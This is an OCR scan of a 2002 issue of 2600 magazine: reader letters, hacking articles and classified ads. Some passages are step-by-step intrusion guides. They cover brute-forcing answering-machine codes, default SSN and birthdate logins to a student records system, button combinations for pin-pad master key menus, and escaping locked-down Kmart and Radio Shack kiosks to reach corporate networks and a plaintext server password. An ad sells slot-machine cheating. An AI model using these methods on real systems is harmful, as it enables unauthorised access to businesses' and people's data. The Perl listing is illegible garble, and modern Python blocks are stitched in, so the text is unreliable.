those folks, you're not browsing separate sites. You
are merely browsing different "properties" owned by
Terra Lycos. It is a rare media company that operates a
diversity of sites and does not do this kind of thing. Of
far, far more concern is third-party traffic watchers like
DoubleClick.

MSM 

Dear 2600: 

Maybe because I work in advertising, maybe
because I have more training in economics than the
average bear, maybe because I know people who work for
firms like doubleclick.net, but maybe because I like
free goods and services, is why I have to complain
about all the derisions against doubleclick, akamai, et
al.

Yes, these firms do invade privacy. They track a
unique identifier - "you," as it were, and they know
when you have been sleeping, they know when you're
awake, etc. But these firms do not pose a threat against
us. 2600 readers should have an affinity for how things
work and should know how to get around them. To
avoid ads without overhead go to
http://www.yoyo.org/~pgl/adservers/ and edit your
hosts file. Turn off cookies, or use cookie management
software, or just do it yourself to your temp folders
from time to time.

These firms provide their clients - websites like
wired, for example - with the revenue that allows them
to go on publishing free news on their website. If you
use any of the ubiquitous free services like weather,
news, e-mail, etc. - services that not more than ten
years ago cost real money, you have firms like
doubleclick and akamai to thank for it.

I'm not saying that you should open your system up for
these firms to pick through, by no stretch of the
imagination. But insofar as online privacy is concerned, the
real "bad guys" are firms that produce things like the
infamous B I )L installation engine, CometCursor, and
others that surreptitiously track your movements. We
all know that doubleclick tracks online activity - that's
what they do. They are not hiding behind a file sharing
protocol, or a web site "enhancement." A little bit of
privacy is the price of admission to premium content
sites. And there is a worse case scenario. A
subscription based Internet would give you even less privacy
because now they would have a name, address, and
credit card number to match up with a browser's
unique global identifier. Knowing this, instead of
running at the mouth at how evil these firms are, put up
or shut up. As long as all of doubleclick's URLs are
pointed at 127.0.0.0, they don't know me, and I don't
care.

Kurt Winter 

Some good points, but what happens when they dr

rocking software? Perhaps they will even make it a
crime. Stranger things have been happening. We feel
people should at least have the option of deciding if
they want to play by these rules. By letting people
know how they work and with some of the information
you've provided, people are better armed to deal with
it. But just because these moneymaking firms are
convinced that this is the only way the net can be run
doesn't make it so. We should always be striving for
ways to provide information and services to the masses
in ways that aren't offensive, intrusive, or expensive.

Dear 2600:

In the article "Basics on Answering Machine
Hacking" in 18:4, Horrid presented a 1005-digit
sequence that contains all the 3-digit numbers between
000 and 999. He asked for another such sequence that's
shorter. Well, it may be a bit simplistic but if he
removed the two trailing zeros from his sequence and
added a 9 at the beginning, it would be shortened by
one digit while still containing all the numbers. It is
well enough to use a computer to generate a number
sequence, but one should exercise a little reasoning as
well.

ascii 32 

You managed to shorten it but your triumph isn't
one to last very long....

Dear 2600:

Horrid's string for accessing answering machines
with 3-digit passwords is almost perfect. The minimal
length for such a string is 1002 digits, not 1005. In
general, the length of a skeleton key for an answering
machine code of length n is 10^n+n-1. In order to
remove unnecessary repetition from Horrid's string,
simply remove positions 999, 1000, and 1001. (The
;ii die end of the string becomes WlO.)

ted 

If you combine this with the previous letter's idea,
you can get this down to 1001!
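
The length formula in the letter above, 10^n+n-1, is the length of a de Bruijn sequence unrolled into a straight line. The Python below is an added example, not code from the magazine or from Horrid's article, and its function names are assumptions. It builds such a sequence with the standard Lyndon-word construction, checks that every code appears as a window, and compares the keypress count with entering each code separately, which is the cost a machine imposes when it requires a terminator key or locks out after wrong tries.

```python
from itertools import product

DIGITS = "0123456789"


def de_bruijn_cycle(k: int, n: int) -> str:
    """Cyclic de Bruijn sequence B(k, n) over the first k digits.

    Standard construction: concatenate, in lexicographic order, every
    Lyndon word whose length divides n. The result has length k**n.
    """
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(DIGITS[d] for d in out)


def linear_key(n: int, k: int = 10) -> str:
    """Unroll the cycle: repeat its first n-1 digits at the end so the
    windows that wrap around the cycle also appear in a straight line."""
    cycle = de_bruijn_cycle(k, n)
    return cycle + cycle[:n - 1]


def missing_codes(stream: str, n: int, k: int = 10) -> list:
    """Codes of length n that never appear as a window of the stream."""
    seen = {stream[i:i + n] for i in range(len(stream) - n + 1)}
    every = {"".join(p) for p in product(DIGITS[:k], repeat=n)}
    return sorted(every - seen)


def keypress_cost(n: int, k: int = 10) -> tuple:
    """(keypresses when each code is entered on its own,
        keypresses when the machine accepts one continuous stream)."""
    return n * k ** n, k ** n + n - 1


if __name__ == "__main__":
    key = linear_key(3)
    print(len(key), "digits; codes missing:", missing_codes(key, 3))
    print("separate entry vs. stream:", keypress_cost(3))
```

A stream of L digits has only L-n+1 windows, so covering all 10^n codes needs at least 10^n+n-1 digits; the checker shows that dropping a single digit from the end already leaves a code uncovered.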

Dear 2600:

After reading the article in 18:4 entitled "Examining
Student Databases," I'm surprised that Screamer
Chaotix wasn't aware that most universities have some


ol's li si' Now what is amazing is that my school

(which shall remain nameless to protect the innocent)
has this information publicly available to everyone
with just a short jot on the URL. Now it's just a good

thing that Chaotix's friend's student ID isn't his SSN
as it is with other schools (imagine the fun). Now the

option to change it does exist, but it is one of those
things that the school information technology
department forgets to tell you during orientation.

P4R4d0x 



■ ■■ Hnu>k has a system called SOAR (Student
Online Access to Records) that not only keeps information
on students (transcript, addresses, phone numbers,
etc.) but on all alumni, often without their knowledge.
The username is the SSN (easily obtained as it's also
the student ID which is printed on everything from
term papers to grade postings) and the password is the
six digit birthdate (also easily obtained or easily
guessed). Those few individuals who managed to
figure out how to change the password in the past will be
delighted to learn that they apparently revert back to
the default after a certain amount of time. It's said that
a new system called SOLAR is about to be launched.
Let's hope the added L somehow brings security.

Dear 2600: 

A year ago, I picked up a copy of 2600 and was
very fond of the information found. It was something I
could read and not cringe at. Fast forward to today and
all I see are articles on "right click suppression" and
"building a wooden computer." Not to mention that
many letters are angst filled piles of jealousy and
stupidity from high school nitwits. What's happened to
2600? It seems to have been going steadily downhill.

Also, in regard to the letter about the Libertarian
Party, your assumptions are wrong. Libertarian beliefs
are founded upon freedom for both the individual and
for the corporation, as well as the belief in personal
responsibility. Corporations are not always honest or
ethical, and the goal of Libertarian views is to prevent
the corporation from impeding upon the citizen (making
laws like the DMCA null), and allowing the citizen
freedom from the state, socially and economically.

Scott 

Usually when we're accused of going steadily
downhill, it's for a longer period of time than a year.
Perhaps you meant to accuse us of a sharp decline? As
for Libertarian beliefs, it all sounds great except for
the fact that it doesn't work. If a government lets huge
corporations write the laws (such as in the United
States today), it's little different than there being no
government at all to keep the corporations in check.
It's only in those places where governments actually
represent the people that there's even a chance of
keeping the corporations from systematically abusing
the power that inevitably comes from being huge.

Dear 2600: 

This is in response to "Right Click Suppression"
(18:4) by Rob Rohan. The right click suppression is
not really a problem and it is in fact quite easy to
bypass by mm- ml nisi \i means. For example, to copy
pictures from the site onto the clipboard, you don't
need right click. Use Internet Explorer (lets you
highlight images) and just highlight the image (or whatever
else you wanted to right-click on) using the left mouse
button. Then simply press the Microsoft context-menu
key (the key between CTRL and ALT on a standard
104-key keyboard; it's next to the Microsoft logo
key). Most people I know find this key to be useless,
and some even remove it. But, don't be fooled. This
key is quite a boon if used to your advantage. As for
people who don't have this key on their keyboard, you
can simply highlight the picture and use the menu
option: Edit, Copy to copy it to the clipboard. In any case,
I think this is considerably easier than writing a Java
program to save the picture.

Emre Yucel

Dear 2600: 

Another way to capture a web page is to simply do
File, Edit Page in Netscape Communicator. I did this
for a web page that had photos on it and it worked like
a charm.

Inter net Guiltless 

Dear 2600: 

In your 18:4 issue in the article "How to Hack from
a RAM Disk" by Nv, the author recommends
destruction of CD media: "If you're really paranoid, you can
torch/incinerate the CD. I've heard nuking the CD in a
microwave is not 100 percent successful in destroying
data (and it stinks!)."

I would like to note that these examples of
destroying CD media are dangerous - fire could get out of
control. I hope no one would actually place CD media
in their microwave. There are also some companies
that sell what they term degauss devices that
effectively act as belt sanders and grind the CD media until
you are left with dust and a plastic disc. I have
recommended my company not purchase these devices as
they are both expensive and unnecessary.

Recently I found, purely by accident, a very
effective and inexpensive way to destroy CD media without
the use of any machinery or heat. I had inadvertently
placed a compact disc in a solution of Purex Bleach.
Twenty-four hours later I found the disc transformed
to a bath of metallic flakes and a plastic disc. The
process may have taken less than 24 hours to dissolve
the actual metal coating on the plastic disc, but it was
not before 24 hours had lapsed that I realized my disc
was in the bleach solution.

Steven Richards 

One of the more hnAMstmg in&dmmtn tic is we 've 
heard of lately . 

Tracking Terrorists 

Dear 2600:

I wanted to comment on a reply to one of your
reader's letters. You stated to someone that basically
trying to hack Bin Laden was a stupid idea. I don't
necessarily agree. Sure, it could be worthless, but
cracking into his bank accounts and such forth would
actually do some good whether you believe it's a
stupid thought or not. It would also be helping the
American cause a lot if the hacker community united and
did something for the sake of our country. We bitch
and moan about how much we hate our country, yet we
were all angered by the events in September and all
were united to help everyone. I mean, it's very
possible that the government themselves are trying to crack
into Bin Laden's accounts.

Chris 

First off, we don't "bitch and moan about how
much we hate our country." We bitch and moan about
those who continually subvert the principles of
democracy and get away with it, all the while masking
themselves in patriotic fervor. Second, when was the last
time you "cracked into a bank account," let alone that
of someone who's on a most wanted list - or in this
case on ALL of them? It's not like on TV and far too
many people seem to think that it is. This leads to the
perception that hackers can be used as some sort of
cyberarmy, which is about the furthest thing from the
truth. Anyone with even a slight familiarity of the
hacker world would know that we're constantly
questioning, disagreeing, exploring, and getting into
trouble. Not exactly the kind of people who would do well
in a military environment. (We happen to hear from a
sizable number of unhappy hackers who somehow
wind up in military service.) Finally, even if it were
something simple, where do you get the right to be the
judge, jury, and executioner? Imagine if everyone took
it upon themselves to impose their brand of justice in
this manner. If you really want to help, the best thing
you can do is be observant and notice things that other
people may not notice. Then let people know what you
see. In this age where the truth is fleeting and mass
manipulation is common, the ability to detect when
something doesn't make sense is a valuable one.

Dear 2600: 

I'm writing to disagree with your analysis that the
government should release an original digital version
of the bin Laden tape. Apparently all digital video
tapes have special "markers" for things like time,
camera lens settings, etc. It seems silly to think that our
government is good enough to fake bin Laden's image
and voice, but can't fake a few digital markers to go
along with that. The government didn't have to release
any evidence at all, so be lucky you got any. If you
reject it then reject it, but don't expect them to pander to
your whims.

Dan 

They didn't have to release any evidence at all?
What kind of world do you live in? It is the obligation
of thinking people everywhere to question and analyze
without relying on blind faith. Almost every major
conflict in the world can be traced to people who refuse to
even entertain the possibility of seeing something they
don't want to see. As people with a technical
knowledge of such things, it was a lot more than a mere
"whim" for us to want to see the timecode of the tape.
There were numerous details attesting to the
authenticity that could have been garnered by seeing these
values. While they could have been faked, it would take
an extraordinary amount of effort and time to get all of
them just right. That's why their release in a timely
manner was so essential. And it's a perfect example of
how hackers can help in these troubled times - by
using some technical knowledge to let the world know if
something makes sense or not. Of course, to do this
properly you have to accept the fact that you don't
know the answer until you analyze the data. It's
puzzling and quite disturbing that the United States
government wouldn't want this evidence to be known. But
what's even worse is when people close their eyes to
the mere possibility that the facts don't add up.





Right Click Suppressed 


by fMe 

The purpose of this article is to provide an
extension to "Right Click Suppression" by Rob
Rohan in 18:4.

Blocking right clicks, whether on the entire
page or just images, is growing more and more
popular as a form of weak copyright protection.
I've encountered sites attempting to prevent me
from saving material copyrighted by people other
than the owner of the page!

In addition to the methods mentioned by Mr.
Rohan, Windoze users can click on an image and
drag it from the browser to their desktop or another
folder to copy the image. Linux users can try the
provided script.

M 

‘ ipjr, ''Script Ninjd bv EVit 

iii. : KL iin.1 fhriiihi d* lacafliwu of ti n^'i- u«Ui npUrjuiHliy iJkJwnluuilsUk- 
■'■1.1 ■ i . .m I iv ttripH iimaJ on ihs jar-* 'r-n iiki j*l help' fuf n* n mri-rmi'T! in 

u i» hik' yiiaiLuin, 1 1* u imom m ii willbf Me^itl 

If 

> 'iny luuijif.-Si- njil S’anja. . \ti 

‘ i • imi, rfi. AispplsciX HxiwiMl ^pniirnL* nnd didn't specify Mp‘ 
\Mi\ || ■#ARUV=-/ hdfv'l 

I 

[mu Hsag<- ^nin>d.pi [-fiiti injures) uri] (uHi ur|3„.J\rt H ; 

P"'ii l HIA'i iiui.sr rmi m i* filename (' lilnil. dc. ) Ur a lurilipg 4nh.fn' ; 

■ • , . ishuii^ LCiv.iktrKiL£‘i rhr iEEidi^tr iWfMtl afctiiy printing p* l. k I (it"; 

iftil, 

j*eml if 

- i ; . \i..inrr .1 (i i j -:r. £ Us nuiige-. 

v Iii A - (- 

■ li 

I "ml if 

►ft* 

I 

i Ulll.llX'i = EJ, 
i Ih'Jwl rl;ie 

4 llm.Mil.fi E-Jt-h | HI 

. 0 vUiifj} - CS'ARO V; SkKipm-l 

i - u 1 1 ; i i ' . ' i. it i he nrg.ti meiU ’ 

I' '• \KOV| \L4H7p|«1 " UetJJlklf'eOl 

r 

ikkU 
liUcml if 
h ii.if-. lire Ule 

■ 1 1 1 • '■■y.'i vAkf iV(Slot*p| -^Tutfmt-ditMnwrtr- 

’ la- e'ji n I'ryrtlt Ll£ .HCp^ilH.' 

mi nVifC* 'utt» rVniu V \H(j v I 1 *!.:,! .p| 'ji 

' HI. I III Nil = (I; 

l inij'ntjin If, 

■ Iii f r Ll flu' 

■ i 1 Lllir fl if I Hi.’ Itf'file, Sthjc++) 

t 

n 1- ijict.' in itriq^c? 

irOlilfiSli. ni£ l =- tetarig/iS 

V 

ir [i stfi f-itFwlIre U ire in Ui*ppv mn'inci 
' ■ h * -fliti 'l -■>]/'. SBklVlinclU 
1'cnitlpnpZ £i; J9fe*|jp2 < ft niwi['- +-«■ 1 

i 

1 1 Jsf-I SJ. - ■ I'hFi-'i | 

I 

I ■ sop = ^ifiKA",'. SK'Slonf!! !.', 

)OfQli>i>fi3 ■ I ; $tou fS' i -. .| i J i- fttefi; £k]g^3-f-+ 1 


The Script 

The script isninja.pl is designed to get around
that kind of right-click protection without having to
root through the source yourself. Supply it with a
few URLs and it will print all of the scripts (including
the one used to block your right-clicks) found
on those pages, along with the URLs of the images.
Optionally, it will download the images and put
them in the current directory. If you want to
download the flash presentations, the midi music, or
whatever, it would be fairly easy to add that to the
script. In the absence of wget, Mr. Rohan's Java
app would also work well. I had to dust off my Perl
skills for this, so please forgive me if it's a bit
sloppy.

[Perl listing of isninja.pl, continued: not legible in this scan]
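The behaviour described above for isninja.pl, as an added Python example rather than the author's Perl: it lists every script and image URL in a page and flags the code that suppresses the context menu, which shows why such blocking protects nothing that is already in the page source. The sample page, its URL and the blocker patterns are constructed assumptions, and the optional image download is left out so the block runs offline.

```python
"""Added example: inventory a page's scripts and images, flag right-click blockers."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample input (not from the article): a page that "protects" its images.
SAMPLE_URL = "http://www.example.com/gallery/index.html"
SAMPLE_HTML = """<html><head><title>Gallery</title>
<script language="JavaScript">
function noRight(e) {
  if (document.all && event.button == 2) { alert("Images are protected"); return false; }
  if (document.layers && e.which == 3) { return false; }
}
if (document.layers) document.captureEvents(Event.MOUSEDOWN);
document.onmousedown = noRight;
</script>
<script src="/js/menu.js"></script>
</head>
<body oncontextmenu="return false">
<img src="photos/one.jpg" alt="1">
<IMG SRC="../banner.gif">
<img src="photos/one.jpg">
<script>var n = 1; if (n < 2) { n++; }</script>
</body></html>"""

# Assumption: patterns typical of context-menu suppression code (heuristic, not exhaustive).
BLOCKER_RE = re.compile(
    r"oncontextmenu|event\.button\s*={2,3}\s*2|\.which\s*={2,3}\s*3", re.I)


class PageInventory(HTMLParser):
    """Collects script blocks, image URLs and inline context-menu handlers."""

    def __init__(self, base_url):
        super().__init__(convert_charrefs=True)
        self.base_url = base_url
        self.scripts = []        # one dict per <script> element
        self.images = []         # absolute image URLs, de-duplicated, in page order
        self.handler_attrs = []  # (tag, attribute, value) for inline blockers
        self._script = None      # script currently being read, if any

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)       # the parser has already lower-cased tag and attribute names
        if tag == "base" and attr.get("href"):
            self.base_url = urljoin(self.base_url, attr["href"])
        elif tag == "script":
            src = urljoin(self.base_url, attr["src"]) if attr.get("src") else None
            self._script = {"src": src, "chunks": []}
        elif tag == "img" and attr.get("src"):
            url = urljoin(self.base_url, attr["src"])
            if url not in self.images:
                self.images.append(url)
        if "oncontextmenu" in attr:
            self.handler_attrs.append((tag, "oncontextmenu", attr["oncontextmenu"] or ""))

    def handle_data(self, data):
        if self._script is not None:   # script text can arrive in several pieces
            self._script["chunks"].append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._finish_script()

    def _finish_script(self):
        if self._script is None:
            return
        body = "".join(self._script["chunks"]).strip()
        self.scripts.append({
            "src": self._script["src"],
            "body": body,
            "blocks_context_menu": bool(BLOCKER_RE.search(body)),
        })
        self._script = None

    def close(self):
        super().close()
        self._finish_script()    # record a <script> left open at end of input


def inventory(html, base_url):
    """Return the scripts, image URLs and inline handlers found in one page."""
    parser = PageInventory(base_url)
    parser.feed(html)
    parser.close()
    return {"scripts": parser.scripts, "images": parser.images,
            "handler_attrs": parser.handler_attrs}


if __name__ == "__main__":
    report = inventory(SAMPLE_HTML, SAMPLE_URL)
    for i, s in enumerate(report["scripts"], 1):
        flag = "  <-- suppresses the context menu" if s["blocks_context_menu"] else ""
        print(f"== Script {i} ({s['src'] or 'inline'}){flag}")
        print(s["body"])
    for tag, name, value in report["handler_attrs"]:
        print(f"== Inline handler on <{tag}>: {name}={value!r}")
    for url in report["images"]:
        print("Image:", url)
```

External scripts are listed by URL only; their bodies would have to be fetched separately before the blocker check could apply to them.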


Spring 2002 








Retail Hardware Revisited

by dual_parallel
dual_parallel@hotmail.com

In this article I'll discuss some variations in a common pin pad, a
couple of hacks at a large retailer, and finally a disturbing trend.

In my last article I discussed the VeriFone PinPad 1000 and the
button presses (all simultaneous) needed to access the Master Key, or
Mkey. Variations exist. Some pads are set to access the Mkey by
pressing the bottom right and top right buttons. But the vast
majority are set to access the Mkey by pressing the bottom right and
top left buttons.

The last article discussed Wal-Mart. This article will discuss its
failing competitor, Kmart. The pin pads at every Kmart register are
Checkmate model CM 2120s, OS 1.07, version 2.1. One can gain access
to the pin pad by pressing the four small buttons by the LCD screen,
and the two bottom-most buttons, green Enter and red Cancel,
simultaneously (think Vulcan mind meld). After an incorrect password,
the pad will cycle, verifying the applications that the user has
authorized access to.

Now, from pin pads to PCs. Walking into Kmart, at the Customer
Service counter, one will immediately see one of two public computers
running BlueLight.com, Kmart's online shopping application. These
computers, the other residing in Electronics or sometimes Sporting
Goods, run NT4, have LCD monitors, a keyboard, and an enclosed
trackball where the right button is trapped under plastic. The
BlueLight.com application starts automatically, so logging off or
shutting down just brings the application right back up.

BlueLight.com (v 1.0.55) is an e-commerce application that features
products and a shopping cart, running on publicly available NT
computers in many Kmarts across the nation. The application is a
browser, accessing the Internet to transmit selections from the local
Kmart to Kmart.com's servers (kih.kmart.com). BlueLight takes over
the machine, running in the foreground. So the first thing to do is
to log off by pressing Ctrl+Alt+Delete and clicking Logoff. The
machine will cycle quickly, bringing up the NT desktop and then the
BlueLight app. Now, do anything to stop the machine from running the
BlueLight app. I was lucky; there was a printer configuration problem
that popped up an error window and stopped BlueLight.

I left the printer error window alone and started poking around the
desktop. I saw that anything significant that could be accessed from
the Start button was missing. Function keys and Task Manager were
disabled. The only thing in the system tray was anti-virus and... the
clock. I double clicked the clock and the time was correct. Not for
long. Windows applications and temporal anomalies do not mix. So I
set the year to 1980, clicked Apply, and OK. Dr. Watson promptly
crashed.

What can I leverage here? One of the buttons in the Dr. Watson error
window was Help. Clicking Help brought up your favorite
Contents-Index-Search. I messed around in Help until I had the option
to search for Windows Help files. This gave me an Open File dialog
box.

Should I search the C drive, C:\WINNT? No, I went to Network
Neighborhood. And there, with little perusing, I saw vast networks
like kmnorthamerica, kminternational, kih.kmart.com - way more than I
could write down without being noticed.

I believe Kmart is counting on securing unwanted access from the
BlueLight computers (which probably have trusted access) to these
large nets by locking down these NT boxes. As you can see this isn't
the case.

Finally, I want to discuss, not a hack, but what I can only call
negligence. Throughout my explorations I examined quite a few pin
pads. And underneath many I would find a sticker with an 800 number
and a client number. The 800 numbers belong to either banks or
transaction handling companies, and the client number is the only
authentication needed to access sales, deposit, and checking account
information for a given vendor. Having dealt with small businesses
and having found these stickers at such, I know that this information
is held closely. It is a shame that someone needs only a remote
interest to access this private information.




2600 Magazine 


More Radio Shack Facts

by c3llph
c3llph@hotmail.com

In the summer and autumn of 2000, Radio Shacks across the country got
a new fixture: the Microsoft Internet Center. At the heart of these
is of course a Compaq Presario 5000 series. Most are [illegible] 600
with 128 MB of RAM and no anti-virus (on these). The computer is
linked by cat 5 to a receiver/decoder box in the back. A Skystar
Advantage model VSTAT 100 is what this store is equipped with. The
Skystar is connected by coax to a commercial size two-way dish on the
roof. Those in cities are equipped with, in all likelihood, DSL. I
assume this because in the kiosk it gives the chance to learn about
high-speed access by either DSL or satellite. The stores in rural
America are equipped with what was Gilat-to-Home
(www.gi[illegible].com). After being called Gilat-to-Home, it was
renamed to Starband. Now Radio Shack or Microsoft has dropped them
for service because they are slowing the show. Other companies have
looked at Gilat including EchoStar, Russia's Yamaltelecom, PMSI,
ISKRA, etc. Radio Shack has now switched to Hughes, the current owner
of our [illegible] satellite TV provider. Only the server has
changed, none of the customer equipment. Gilat had prior to the
switch put out version two of their receiver box, a free upgrade to
existing customers. This original setup required you to purchase one
of two specially configured Compaq computers, priced at $999 or $1299
in addition to the actual satellite equipment and overpriced
installation. Since then, about May or June '01, both computers have
been discontinued and are no longer available. From other dealers I
have talked to, the lower cost machine wasn't up to par for the
system from the beginning. Originally the January or February '01
release was the only version that could run with an existing computer
to hook up to the satellite system. These add-on boxes ended up
working with only about one out of every ten computers. So they have
been "finishing" testing for USB-only add-on boxes. Since these are
always connected, they have a constant assigned IP.

In some franchise stores for sure, maybe in corporate ones also
depending on the intellect of the managers and their location (i.e.,
broadband options), owners/managers have tied into the 2-way dish to
access the Internet for their store's Internet connection. They do
this either by use of a [illegible] computer set up as a proxy server
or with the supplied Compaq computer itself, depending on how safe
they want their store's POS and Compaq display computers to be.

In addition, the Compaq computers themselves are stripped of most
functionality. All f-keys are disabled, you can open "my computer"
with only the cd rom drive, Ctrl-Alt-Del is active but there is an
easier way. When clicking on start, then documents, if you click on
"my documents", you get into the folder. Way too easy. From there you
can navigate as usual, except right clicking. Most of those options
are available on the file button anyway. You have almost all rights
including opening a DOS prompt and access to regedit.

Name Database 

All stores (corporate and franchise) keep local in-store records
only. Once a month the entire database is uploaded to Radio Shack's
corporate office. The old addresses are included in this for the
purpose of recent address/phone number changes, etc. Then the Radio
Shack corporate office crosses this with their previous files to
complete the database update. Then we all get a flyer in the mail
once a month. The flyers come at no cost to your local franchise
stores. That is why we are always asking for your info. It's free
advertising. Also, a recent update to the Radio Shack POS, found at
www.radioshackpos.com, Allzip.exe, a self-extracting WinZip file, has
let us add all the zip codes in the U.S. or per state if we so wish.
Most POS updates have both full install (server) and file only
(client). Allzip.exe is installed on the server only, not any of the
client computers. This creates two files in the C:\RSPOSlC3\RSFILES
directory, the same directory that holds all inventory, customer
name, and most other database files. The files created are
Rsallzip.exe and IVipcode.hms. When you run the exe, you get your
choice of which states you want to add, one or all. You choose which
ones, hit OK, then just enter the zip code and get the city name. You
now don't have to ask the customer how to spell Kalamazoo, or
wherever they are from. Something interesting happens after the
initial installation and running of RSallzip.exe. When run again it
wants to connect up to the Radio Shack corporate server and look for
new updates. When it does, it gives a basic store info screen that
happens to have the server password listed in plain text.

I hope I have shed a little light on Radio Shack doings. Also, I hope
all of this info is correct. It may differ between store types and
states.





Marketplace

Happenings

REGISTRATION IS UNDERWAY FOR H2K2 - the 4th HOPE conference, taking
place July 12-14, 2002 at the Hotel Pennsylvania in New York City!
Admission for the entire weekend is $50. You can register online at
www.2600.com or send a check/money order by 6/15/02 to 2600/H2K2, PO
Box 752, Middle Island, NY 11953 USA. We've secured a special
conference rate at the hotel of $109 for a single or double, $119
triple, $129 quad. Call 212-736-5000 and ask for the H2K2 rate. (You
might even be able to find cheaper rates at hotel discount sites on
the net.) The Hotel Pennsylvania is easily accessible from anywhere
in New York City - it's directly across the street from Penn Station
on 7th Avenue. We've got 50,000 square feet to play with and we have
lots of plans for this massive space - more than 4 times the space we
had for our last conference. If you have an idea for a panel or
presentation, it's not too late! E-mail speakers@h2k2.net. We're also
looking for participants to help us fill this space with interesting
projects of all kinds including computers, robots, artwork, etc.
Email space@h2k2.net if you're interested in helping us fill the
space. We need a ton of volunteers in all areas to make this happen.
You guessed it: volunteers@h2k2.net. We will also have space for
small vendors who have things of interest for hackers. E-mail
vendors@h2k2.net to become part of that. If you want to take part in
online discussions focusing on the upcoming conference, join the H2K2
mailing list by e-mailing majordomo@2600.com and typing "subscribe
h2k2" on the first line of your message. As always, check
www.hope.net or www.h2k2.net for updates!

DUTCH HACKER MEETINGS. Every second Sunday of the month 't Klaphek
organizes a meeting at the meeting point of the central station of
Utrecht in the Netherlands. Everyone interested in hacking related
subjects is welcome to show up. These meetings are similar to the
2600 meetings. We meet around 14:00 (2 pm) in front of the GWK office
monthly. We hope to see you there! More info can be found at
www.klaphek.nl/meetings.html

SAN FRANCISCO OPENBSD USERS GROUP - now meeting once a month at the
Zephyr Cafe. 2nd Thursday [illegible] - see http://www.sfobug.org.

SUMMERCON 2002 will take place May 31 - June 1 in Washington DC at
the Marriott Renaissance [illegible] NW by Gallery Place. For more
info, visit www.summercon.org.


For Sale

FREEDOM DOWNTIME, the feature-length 2600 documentary, is now
available on video! See the adventure unfold as we try to get to the
bottom of the Kevin Mitnick story and prevent a major motion picture
from spreading more lies. Available on VHS in NTSC (U.S.) format, 121
minutes. Send $20 to 2600, PO Box 752, Middle Island, NY 11953 or
order via our online store at www.2600.com.

REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the
like? For a copy of Infiltration, the zine about going places you're
not supposed to go, send $2 to PO Box 13, Station E, Toronto, ON M6H
4E1, Canada.

MAKE ANY SLOT MACHINE PAYOUT [illegible]. Works on [illegible]
machines. No contact. Also available, blackjack counters. E-mail
[illegible] if you want to discuss it further.

WWW.PROTECT-ONE.COM. Protect yourself! Everyone has a need to be and
feel safe from the outside world. We carry a full line of self
defense, security, and surveillance products at low prices.
Everything from alarms to mini cameras to telescopic batons to stun
guns and more! Check us out, all major credit cards accepted. We ship
worldwide!

CYBERTECH TECHNOLOGICAL SURVIVAL NEWSLETTER: Bimonthly high tech and
low tech DIY information on self-reliance and preparedness edited by
2600 writer Thomas Icom. Topics include communications, security,
weaponry, electronics, alternative energy, survival medicine, and
intelligence operations. Send $12 cash or "payee blank" money order
to Cybertech, PO Box 641, Marion, CT 06444 or subscribe via Paypal on
our website at http://www.ticom-tech.com/.

MACINTOSH HACKERS can get all the mac underground files on a
professionally published CD. 650 Megs of PURE mac filez. Includes the
Defcon 7 Macintosh security speech, the whole Freaks Macintosh
Archives and Whacked Mac Archives. $25.00 USD - will ship
internationally. SecureMac, PMB 310, 6170 W. Lake Mead Blvd., Las
Vegas, NV 89108, USA. Hack from your Mac!

LEARN LOCK PICKING. It's EASY with our new book. Learn what they
don't want you to know. Any security system can be beaten, many times
right through the front door. Be secure. Learn the secrets and
weakness of today's locks. If you want to get where you are not
supposed to be, this book could be your answer. Explore the
empowering world of lock picking. Send twenty bucks to Standard
Publications, PO Box 2226HQ, Champaign, IL 61825 or visit us at
www.standardpublications.com/direct/2600.html for your special price.

COVERTACCESS.COM. [illegible] EQUIPMENT and SERVICES providing you
with the physical and records access you need!

OVER 150 TELECOM MANUALS are now available online for free
viewing/downloading at The Synergy Global Network's fully redesigned
website. Most being available in Adobe PDF format, they are crisp,
clean, suitable for printing, and complete. Update your phreak
library now before it's too late. We don't know how long this website
will be allowed to distribute these manuals, however they are yours
for the time being. Our website is free and open to the public, and
requires no purchase of any kind, and is also free from pop-up (or
pop-under) advertisements as well. PAYPHONE SERVICE MANUALS TOO!
Visit us online at: http://www.synergyglobalnetworks.com

HATE MICROSOFT? Or do they just leave a foul aftertaste? Show your
dissatisfaction with a "Calvin peeing on Microsoft" sticker. Sticker
is approx. [illegible] and fits nicely in a car window or even on the
side of your favorite *nix box. Each sticker is made of commercial
grade vinyl. Water and UV ray resistant. To see a sample go to
http://calvinhatesmicrosoft.hypermart.net. [illegible] (US),
[illegible] (US) for international. Order the Calvin sticker and the
MS logo is yours free. That's right, THE MICROSOFT LOGO IS FREE (eat
that one, Bill). Send all orders to CD Mayne, PO Box 571791, Murray,
Utah 84157 USA. Cash or money orders only. No checks, credit cards,
or COD. Allow 2-3 weeks for delivery via USPS.

BECOME RECOGNIZED as the hacker, phreaker, or computer guru you
really are. BROWNTEK.COM has a wide selection of clothing and gear
especially designed for the computer underground. From our exclusive
"Blame the Hackers" t-shirt series, to coffee mugs, to decals and
[illegible], BROWNTEK.COM has what you're looking for. Check us out!

CRYPTO OUTLAW T-SHIRTS. Governments around the world are turning
innocent people into crypto outlaws. Where will the madness end?
Cryptography may be our last hope for privacy. From Curvedspace, the
unofficial band of anarcho-capitalism. Get yours at
curvedspace.org/merchandise.html


Help Wanted 


HIRING PROFESSIONAL INTERNET CONSULTANTS with job references only for
the following: website security, performance tuning, and marketing
for online magazine. Please send your bio and resume to:
[illegible]@yahoo.com - you can work from home, but should live in
(or around) NYC, as you will need to attend a meeting or two.

NEED ASSISTANCE to rescue/recover ASCII text data which are presently
compressed/encrypted by some type of commercial program. Most files
are rather large, from 30MB to about 600MB. Using DOS based search
engine for retrieval. Please advise if there exists any tools
currently available or anyone who may be of help.
[illegible]@hotmail.com.

I NEED TO BUILD A HIDDEN CAMERA SYSTEM including sound on a limited
budget to take with me on my visits with my [illegible] in order to
prove that everything is going well. Please e-mail any
recommendations to [illegible]@yahoo.com, fax (705) 330-[illegible].

LOCKSMITHS: I am in need of a keymaker from only a picture or a
pencil sketch-over of a key. Depending on timing and location, I may
